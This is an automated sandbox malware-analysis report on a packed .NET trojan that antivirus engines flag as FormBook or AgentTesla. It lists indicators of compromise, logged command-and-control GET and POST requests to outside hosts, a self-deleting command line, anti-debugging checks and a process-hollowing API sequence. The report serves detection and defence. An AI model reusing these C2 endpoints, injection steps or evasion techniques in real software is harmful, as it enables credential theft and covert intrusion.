Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 21, 2021, 5:19 p.m.	June 21, 2021, 5:21 p.m.

Size	704.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`44d30f858fcb66c0fa2b475f60d8f6f3`
SHA256	`556900b033c6969b8c33c7fd00a36e94561acc33357e845876abf791ede3ba27`
CRC32	`9EFDA799`
ssdeep	`12288:EtJvtWFHmsdP0Bx0CDSSmNGOUmfypuWn7cer/HhU:EX6H7MBfSrHfyAQ7cer`
PDB Path	C:\Users\Administrator\Desktop\Client\Temp\rPYCGHRqok\src\obj\Debug\ClassPropertyWriter.pdb
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT PE_Header_Zero - PE File Signature Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library

vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
3324
- vbc.exe "C:\Users\test22\AppData\Local\Temp\vbc.exe"
  1660
  - raserver.exe "C:\Windows\SysWOW64\raserver.exe"
    8264
    - cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\vbc.exe"
      8772

Name	Response	Post-Analysis Lookup
edgedl.me.gvt1.com	A 34.104.35.123	34.104.35.123
www.cyrilgraze.com	A 172.67.138.177 A 104.21.65.7	172.67.138.177
www.micheldrake.com	CNAME micheldrake.com A 192.0.78.25 A 192.0.78.24	192.0.78.25
www.zgcbw.net
www.buylocalclub.info
www.m678.xyz

IP Address	Status	Action
104.21.65.7	Active	Moloch
142.250.66.110	Active	Moloch
142.250.66.131	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
192.0.78.25	Active	Moloch
34.104.35.123	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 34.104.35.123:80 -> 192.168.56.102:49819	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.102:49815 -> 104.21.65.7:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 34.104.35.123:80 -> 192.168.56.102:49819	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.102:49815 -> 104.21.65.7:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49815 -> 104.21.65.7:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49813 -> 142.250.66.110:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49817 -> 142.250.66.131:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.104.35.123:80 -> 192.168.56.102:49819	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.102:49821 -> 192.0.78.25:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49821 -> 192.0.78.25:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.102:49821 -> 192.0.78.25:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49813 142.250.66.110:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com	f6:bb:41:2d:b9:00:0e:0f:6a:a0:82:ab:72:f2:75:3a:e2:ab:b9:88
TLS 1.2 192.168.56.102:49817 142.250.66.131:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com	a7:17:ed:ad:21:3b:2b:b1:6a:c3:ac:06:c3:c5:4a:4d:7c:5b:9b:f8

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 21, 2021, 5:19 p.m.			0	0
IsDebuggerPresent June 21, 2021, 5:19 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey June 21, 2021, 5:20 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00688c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 5:20 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00689100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 21, 2021, 5:20 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00689100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

C:\Users\Administrator\Desktop\Client\Temp\rPYCGHRqok\src\obj\Debug\ClassPropertyWriter.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 21, 2021, 5:19 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.cyrilgraze.com/p2io/?WZ=ytsDIrP&ibxHRhGx=PONkgH6OT+IdHpvpbj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsMLieTk0sG+frQWfUBsy
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.micheldrake.com/p2io/?WZ=ytsDIrP&ibxHRhGx=d2NgnqRQHDqC8zfUpSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPqxZu8ECgv8Wi9ydyjUw
suspicious_features	POST method with no referer header	suspicious_request	POST https://update.googleapis.com/service/update2?cup2key=10:2052101556&cup2hreq=876c248ec5ef25e72ce37cb3d31e61f13291d289045ee395f5c45bb4a691de2a

Performs some HTTP requests (8 events)

request	POST http://www.cyrilgraze.com/p2io/
request	GET http://www.cyrilgraze.com/p2io/?WZ=ytsDIrP&ibxHRhGx=PONkgH6OT+IdHpvpbj4YyU3gBn/U0y1OFS1Y8BXnr3YdY2x3tUozsMLieTk0sG+frQWfUBsy
request	HEAD http://edgedl.me.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request	POST http://www.micheldrake.com/p2io/
request	GET http://www.micheldrake.com/p2io/?WZ=ytsDIrP&ibxHRhGx=d2NgnqRQHDqC8zfUpSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPqxZu8ECgv8Wi9ydyjUw
request	GET http://edgedl.me.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request	GET https://clients2.google.com/service/check2?crx3=true&appid=%7B430FD4D0-B729-4F61-AA34-91526481799D%7D&appversion=1.3.36.32&applang=&machine=1&version=1.3.36.32&userid=&osversion=6.1&servicepack=Service%20Pack%201
request	POST https://update.googleapis.com/service/update2?cup2key=10:2052101556&cup2hreq=876c248ec5ef25e72ce37cb3d31e61f13291d289045ee395f5c45bb4a691de2a

Sends data using the HTTP POST Method (3 events)

request	POST http://www.cyrilgraze.com/p2io/
request	POST http://www.micheldrake.com/p2io/
request	POST https://update.googleapis.com/service/update2?cup2key=10:2052101556&cup2hreq=876c248ec5ef25e72ce37cb3d31e61f13291d289045ee395f5c45bb4a691de2a

Allocates read-write-execute memory (usually to unpack itself) (43 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 2293760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00740000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fba2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00490000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00550000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00540000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00541000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:19 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01240000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 3324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01241000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 1660 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 8264 region_size: 3158016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fe0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\vbc.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\vbc.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 21, 2021, 5:20 p.m.	thread_identifier: 6744 thread_handle: 0x000000c4 process_identifier: 8772 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /c del "C:\Users\test22\AppData\Local\Temp\vbc.exe" filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000110	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000ace00', u'virtual_address': u'0x00002000', u'entropy': 7.450044832145352, u'name': u'.text', u'virtual_size': u'0x000acd68'}

entropy

7.45004483215

description

A section with a high entropy has been found

entropy

0.982942430704

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 21, 2021, 5:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW June 21, 2021, 5:20 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

/c del "C:\Users\test22\AppData\Local\Temp\vbc.exe"

Communicates with host for which no DNS query was performed (3 events)

host	142.250.66.110
host	142.250.66.131
host	172.217.25.14

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 1660 region_size: 163840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000026c	1	0	0

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Local\Temp\vbc.exe

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 21, 2021, 5:20 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELu=à pðÏ@@.text op ` base_address: 0x00400000 process_identifier: 1660 process_handle: 0x0000026c	1	1	0
WriteProcessMemory June 21, 2021, 5:20 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1660 process_handle: 0x0000026c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 21, 2021, 5:20 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELu=à pðÏ@@.text op ` base_address: 0x00400000 process_identifier: 1660 process_handle: 0x0000026c	1	1	0

File has been identified by 19 AntiVirus engines on VirusTotal as malicious (19 events)

CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
McAfee	Artemis!44D30F858FCB
Cybereason	malicious.302d0c
Symantec	Scr.Malcode!gdn30
ESET-NOD32	a variant of MSIL/Kryptik.ABOX
APEX	Malicious
Avast	Win32:PWSX-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
TrendMicro	TrojanSpy.MSIL.NEGASTEAL.SMG
McAfee-GW-Edition	Artemis!Trojan
Emsisoft	Trojan.Crypt (A)
SentinelOne	Static AI - Suspicious PE
Microsoft	Trojan:Win32/AgentTesla!ml
ZoneAlarm	UDS:DangerousObject.Multi.Generic
Cynet	Malicious (score: 100)
Malwarebytes	Trojan.MalPack.ADC
TrendMicro-HouseCall	TrojanSpy.MSIL.NEGASTEAL.SMG
MaxSecure	Trojan.Malware.300983.susgen
AVG	Win32:PWSX-gen [Trj]

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3324 called NtSetContextThread to modify thread in remote process 1660
NtSetContextThread June 21, 2021, 5:20 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4313072 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000268 process_identifier: 1660	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3324 resumed a thread in remote process 1660
NtResumeThread June 21, 2021, 5:20 p.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 1660	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (14 events)

Time & API	Arguments	Status	Return
NtResumeThread June 21, 2021, 5:19 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 3324	1	0
NtResumeThread June 21, 2021, 5:19 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 3324	1	0
NtResumeThread June 21, 2021, 5:19 p.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 3324	1	0
NtResumeThread June 21, 2021, 5:20 p.m.	thread_handle: 0x00000260 suspend_count: 1 process_identifier: 3324	1	0
CreateProcessInternalW June 21, 2021, 5:20 p.m.	thread_identifier: 1888 thread_handle: 0x00000268 process_identifier: 1660 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000026c	1	1
NtGetContextThread June 21, 2021, 5:20 p.m.	thread_handle: 0x00000268	1	0
NtAllocateVirtualMemory June 21, 2021, 5:20 p.m.	process_identifier: 1660 region_size: 163840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000026c	1	0
WriteProcessMemory June 21, 2021, 5:20 p.m.	buffer: MZERèXè ÈÀ<ÁÀ(ÿá¸º´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"úHuQH"ÏH:QH"ÌH8QHRich9QHPELu=à pðÏ@@.text op ` base_address: 0x00400000 process_identifier: 1660 process_handle: 0x0000026c	1	1
WriteProcessMemory June 21, 2021, 5:20 p.m.	buffer: base_address: 0x00401000 process_identifier: 1660 process_handle: 0x0000026c	1	1
WriteProcessMemory June 21, 2021, 5:20 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1660 process_handle: 0x0000026c	1	1
NtSetContextThread June 21, 2021, 5:20 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4313072 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000268 process_identifier: 1660	1	0
NtResumeThread June 21, 2021, 5:20 p.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 1660	1	0
CreateProcessInternalW June 21, 2021, 5:20 p.m.	thread_identifier: 6696 thread_handle: 0x0000004c process_identifier: 8264 current_directory: filepath: C:\Windows\SysWOW64\raserver.exe track: 1 command_line: filepath_r: C:\Windows\SysWOW64\raserver.exe stack_pivoted: 0 creation_flags: 134217740 (CREATE_NO_WINDOW\|CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x000000bc	1	1
